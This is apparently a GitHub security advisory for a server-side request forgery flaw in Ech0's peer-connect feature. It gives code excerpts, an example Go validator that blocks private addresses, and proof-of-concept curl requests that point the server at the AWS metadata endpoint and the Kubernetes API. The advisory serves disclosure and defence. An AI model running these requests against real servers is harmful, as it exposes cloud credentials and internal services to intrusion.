GHSA-8mc6-xjpr-h98x - Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnect

📡 GitHub-Advisory · 2026-05-07

GHSA-8mc6-xjpr-h98x HIGH go/github.com/lin-snow/ech0

CVE:

Summary

The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest, which performs no SSRF protection, instead of SendSafeRequest, whose ValidatePublicHTTPURL check blocks private IP ranges. As a result, any authenticated user can make the server issue requests to arbitrary URLs, including internal services and cloud metadata endpoints.

Details

In internal/service/connect/connect.go, the fetchPeerConnectInfo function:

func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {
    url := httpUtil.TrimURL(peerConnectURL) + "/api/connect"
    // SendRequest performs no destination check; SendSafeRequest would run ValidatePublicHTTPURL first
    resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout)

This uses SendRequest, which performs no URL validation at all. The codebase already has SendSafeRequest at internal/util/http/http.go:228-281 with proper SSRF protection, but fetchPeerConnectInfo does not use it.

Called from:

  • Line 307: data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)
  • Line 498: data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)
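The check that fetchPeerConnectInfo skips, as an added example rather than Ech0's own code: a ValidatePublicHTTPURL-style validator that refuses hosts which are, or resolve to, non-public addresses, plus an http.Client that repeats the check on the address actually dialed. The blocked-range list, the injected resolver and the names isBlocked and NewSafeClient are assumptions, not taken from the project.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/url"
	"syscall"
)

// Added example, not Ech0's code. CGNAT is not in net.IP's built-in predicates.
var _, cgnat, _ = net.ParseCIDR("100.64.0.0/10")

// isBlocked: unspecified, loopback, private/ULA, link-local (incl. 169.254.169.254), multicast, CGNAT.
func isBlocked(ip net.IP) bool {
	return ip == nil || ip.IsUnspecified() || ip.IsLoopback() || ip.IsPrivate() ||
		ip.IsLinkLocalUnicast() || ip.IsMulticast() || cgnat.Contains(ip)
}

// ValidatePublicHTTPURL: http(s) only, and no host that is or resolves to a blocked IP.
// resolve is injected so tests run offline; pass net.LookupIP in production.
func ValidatePublicHTTPURL(raw string, resolve func(string) ([]net.IP, error)) error {
	u, err := url.Parse(raw)
	if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
		return fmt.Errorf("not an http(s) URL: %q", raw)
	}
	host := u.Hostname()
	ips := []net.IP{net.ParseIP(host)}
	if ips[0] == nil { // a hostname, not a literal: check every A/AAAA answer
		if ips, err = resolve(host); err != nil || len(ips) == 0 {
			return fmt.Errorf("cannot resolve %q: %v", host, err)
		}
	}
	for _, ip := range ips {
		if isBlocked(ip) {
			return fmt.Errorf("%q resolves to blocked address %s", host, ip)
		}
	}
	return nil
}

// NewSafeClient re-checks the address actually dialed, so a redirect or a DNS
// answer that changed after validation (rebinding) still cannot reach inside.
func NewSafeClient() *http.Client {
	d := &net.Dialer{Control: func(_, addr string, _ syscall.RawConn) error {
		host, _, _ := net.SplitHostPort(addr) // on error host is "" and is blocked
		if isBlocked(net.ParseIP(host)) {
			return fmt.Errorf("dial to %s blocked", addr)
		}
		return nil
	}}
	return &http.Client{Transport: &http.Transport{DialContext: d.DialContext}}
}
```

Validating the URL once at submission time is not enough on its own, because the peer's DNS answer can change between the check and the fetch; the dial-time check in NewSafeClient closes that gap.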

PoC

# 1. Add a connection pointing to AWS metadata service
curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -d '{"connect_url": "http://169.254.169.254/latest/meta-data/instance-id"}'

# 2. Trigger SSRF via health check
curl -H "Authorization: Bearer <token>" \
  "https://ech0.example.com/api/connects/health"
# Returns AWS EC2 instance ID

Or for Kubernetes:

curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -d '{"connect_url": "http://kubernetes.default.svc.cluster.local:443/api"}'

Impact

  • Confidentiality: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API
  • CWE-918: Server-Side Request Forgery
